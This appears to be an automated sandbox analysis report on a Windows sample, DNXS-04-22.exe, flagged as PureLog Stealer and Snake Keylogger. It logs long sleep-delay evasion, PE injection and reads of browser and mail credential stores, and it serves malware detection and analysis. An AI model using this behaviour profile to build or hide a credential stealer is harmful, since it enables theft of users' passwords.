Source: C:\Users\user\Desktop\DNXS-04-22.exe	Memory allocated: 4A60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239748	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239640	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239517	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239406	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239172	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239062	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598662	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598327	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597545	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596540	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596022	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595913	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594585	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594474	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594226	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593793	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593687	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593571	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593358	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Window / User API: threadDelayed 840	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Window / User API: threadDelayed 645	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Window / User API: threadDelayed 2849	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Window / User API: threadDelayed 6995	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239748s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239517s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448	Thread sleep time: -239062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7472	Thread sleep count: 2849 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7472	Thread sleep count: 6995 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598662s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597545s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596540s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -596022s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -595913s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -595811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594585s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594474s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594226s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593793s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593571s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468	Thread sleep time: -593358s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239748	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239640	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239517	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239406	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239297	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239172	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 239062	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598662	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598327	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597545	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596540	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596217	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 596022	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595913	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595811	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594585	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594474	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594226	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593793	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593687	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593571	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Thread delayed: delay time: 593358	Jump to behavior

Source: DNXS-04-22.exe, 00000004.00000002.3785424343.0000000000D57000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Code function: 4_2_0677BE28 LdrInitializeThunk,

4_2_0677BE28

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Memory written: C:\Users\user\Desktop\DNXS-04-22.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"			Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"			Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Users\user\Desktop\DNXS-04-22.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Users\user\Desktop\DNXS-04-22.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.7570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.337a064.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.337b07c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.3359434.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DNXS-04-22.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DNXS-04-22.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.7570000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.337a064.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DNXS-04-22.exe.337b07c.3.raw.unpack, type: UNPACKEDPE
